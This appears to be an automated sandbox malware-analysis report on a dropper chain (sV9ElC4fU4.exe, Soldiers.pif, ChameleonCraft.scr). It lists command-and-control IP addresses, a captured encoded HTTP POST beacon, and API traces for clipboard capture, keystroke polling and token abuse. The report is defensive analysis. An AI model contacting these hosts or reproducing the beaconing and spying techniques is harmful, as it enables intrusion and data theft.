      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 162X-Api-Key: 6XasKCGZAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 14 15 39 0f 07 30 2d 15 0d 34 0e 31 06 15 29 0c 0d 2b 0d 17 0e 18 21 33 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 16 09 36 17 1c 0d 27 1e 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 13 11 53 07 07 0d 0d 30 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 3a 39 3c 48 0a 30 1b 5c 20 23 3a 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a Data Ascii: M*L\K90-41)+!3EOM:DSE6'LJK9AULS0EOM9L\KW:9<H0\ #:EOM\EYM_^RVS^W\YVW]^VXYVSK
      Source: ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
      Source: ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
      Source: ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
      Source: Soldiers.pif, 00000016.00000002.2716944772.000000000A8F6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91Start
      Source: ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91User-Agent:
      Source: Soldiers.pif, 00000016.00000002.2716944772.000000000A8AE000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000AC50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91http://46.8.232.106
      Source: ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253
      Source: sV9ElC4fU4.exe, 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmp, Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9A6000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9C7000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2715810189.000000000A862000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2716944772.000000000A8BA000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACE2000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD3C000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACAC000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2718265505.000000000ADB6000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACC9000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD4D000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD2A000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
      Source: Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9A6000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9C7000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2715810189.000000000A862000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2716944772.000000000A8BA000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACE2000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD3C000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACAC000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2718265505.000000000ADB6000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACC9000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD4D000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD2A000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9A6000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9C7000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2715810189.000000000A862000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2716944772.000000000A8BA000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACE2000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD3C000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACAC000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2718265505.000000000ADB6000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACC9000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD4D000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD2A000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: sV9ElC4fU4.exe, 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmp, Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9A6000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9C7000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2715810189.000000000A862000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2716944772.000000000A8BA000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACE2000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD3C000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACAC000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2718265505.000000000ADB6000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACC9000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD4D000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD2A000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
      Source: sV9ElC4fU4.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9A6000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9C7000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2715810189.000000000A862000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2716944772.000000000A8BA000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACE2000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD3C000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACAC000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2718265505.000000000ADB6000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACC9000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD4D000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD2A000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: sV9ElC4fU4.exe, 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmp, Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9A6000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9C7000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2715810189.000000000A862000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2716944772.000000000A8BA000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACE2000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD3C000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACAC000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2718265505.000000000ADB6000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACC9000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD4D000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD2A000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
      Source: Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9A6000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9C7000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2715810189.000000000A862000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2716944772.000000000A8BA000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACE2000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD3C000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACAC000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2718265505.000000000ADB6000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACC9000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD4D000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD2A000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9A6000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9C7000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2715810189.000000000A862000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2716944772.000000000A8BA000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACE2000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD3C000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACAC000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2718265505.000000000ADB6000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACC9000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD4D000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD2A000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: sV9ElC4fU4.exe, 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmp, Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9A6000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9C7000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2715810189.000000000A862000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2716944772.000000000A8BA000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACE2000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD3C000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACAC000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2718265505.000000000ADB6000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACC9000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD4D000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD2A000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
      Source: Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 0000000B.00000000.1495388280.00000000009A9000.00000002.00000001.01000000.00000005.sdmp, ChameleonCraft.scr, 00000011.00000000.1633200129.0000000000A69000.00000002.00000001.01000000.00000008.sdmp, Soldiers.pif, 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmp, ChameleonCraft.scr, 00000017.00000000.2177972009.0000000000A69000.00000002.00000001.01000000.00000008.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9A6000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9C7000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2715810189.000000000A862000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2716944772.000000000A8BA000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACE2000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD3C000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACAC000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2718265505.000000000ADB6000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACC9000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD4D000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD2A000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Analyses.0.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: sV9ElC4fU4.exe, 00000000.00000002.1471816218.000000000041F000.00000004.00000001.01000000.00000003.sdmp, Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9A6000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9C7000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2715810189.000000000A862000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2716944772.000000000A8BA000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACE2000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD3C000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACAC000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2718265505.000000000ADB6000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACC9000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD4D000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD2A000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drString found in binary or memory: https://www.globalsign.com/repository/06
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00954632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,22_2_00954632
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00954830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,22_2_00954830
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A14830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,23_2_00A14830
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00954632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,22_2_00954632
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00940508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,22_2_00940508
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0096D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,22_2_0096D164
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A2D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,23_2_00A2D164

      System Summary

      barindex
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009442D5: CreateFileW,DeviceIoControl,CloseHandle,22_2_009442D5
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00938F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,22_2_00938F2E
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeCode function: 0_2_00403899 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403899
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00945778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,22_2_00945778
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A05778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,23_2_00A05778
      Source: C:\Users\user\Desktop\sV9ElC4fU4.exeCode function: 0_2_004075770_2_00407577
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009023F522_2_009023F5
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0096840022_2_00968400
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0091650222_2_00916502
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008EE6F022_2_008EE6F0
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0091265E22_2_0091265E
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0090282A22_2_0090282A
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009189BF22_2_009189BF
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00960A3A22_2_00960A3A
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00916A7422_2_00916A74
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008F0BE022_2_008F0BE0
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0093EDB222_2_0093EDB2
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0090CD5122_2_0090CD51
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00960EB722_2_00960EB7
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00948E4422_2_00948E44
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00916FE622_2_00916FE6
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008EB02022_2_008EB020
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009033B722_2_009033B7
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008E94E022_2_008E94E0
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0090F40922_2_0090F409
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008FD45D22_2_008FD45D
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009016B422_2_009016B4
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008EF6A022_2_008EF6A0
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008FF62822_2_008FF628
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008E166322_2_008E1663
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_009078C322_2_009078C3
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0090DBA522_2_0090DBA5
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00901BA822_2_00901BA8
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008E9C8022_2_008E9C80
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00919CE522_2_00919CE5
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_008FDD2822_2_008FDD28
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_0090BFD622_2_0090BFD6
      Source: C:\Users\user\AppData\Local\Temp\353685\Soldiers.pifCode function: 22_2_00901FC022_2_00901FC0
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009C23F523_2_009C23F5
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A2840023_2_00A28400
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009D650223_2_009D6502
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009AE6F023_2_009AE6F0
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009D265E23_2_009D265E
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009C282A23_2_009C282A
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_009D89BF23_2_009D89BF
      Source: C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrCode function: 23_2_00A20A3A23_2_00A20A3A
